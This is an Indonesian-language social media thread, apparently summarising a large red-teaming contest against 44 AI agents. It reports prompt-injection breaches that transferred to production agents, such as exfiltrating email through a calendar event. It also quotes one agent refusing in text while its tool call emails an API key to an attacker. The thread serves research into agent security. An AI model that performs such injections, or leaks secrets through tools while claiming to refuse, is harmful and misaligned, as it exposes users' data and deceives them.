Kami mengerahkan 44 agen AI dan menawarkan internet $170K untuk menyerang mereka. 1,8 juta upaya, 62 ribu pelanggaran, termasuk kebocoran data dan kerugian finansial. 🚨 Yang memprihatinkan, eksploitasi yang sama ditransfer ke agen produksi langsung... (contoh: mengeksfiltrasi email melalui acara kalender) 🧵
Banyak istirahat bersifat universal dan dapat dipindahtangankan. Pola salin-tempel bekerja di seluruh tugas, model, dan pagar pembatas. Jika merusak satu agen hari ini, kemungkinan besar itu merusak agen Anda.
Kegagalan favorit: "menolak dalam teks, bertindak dalam alat." 😈 Model: "Saya tidak dapat membagikan kredensial." Kemudian: send_email(to=attacker, body="API_KEY=****") UI terlihat aman; Lapisan alat melakukan kerusakan.
466,6K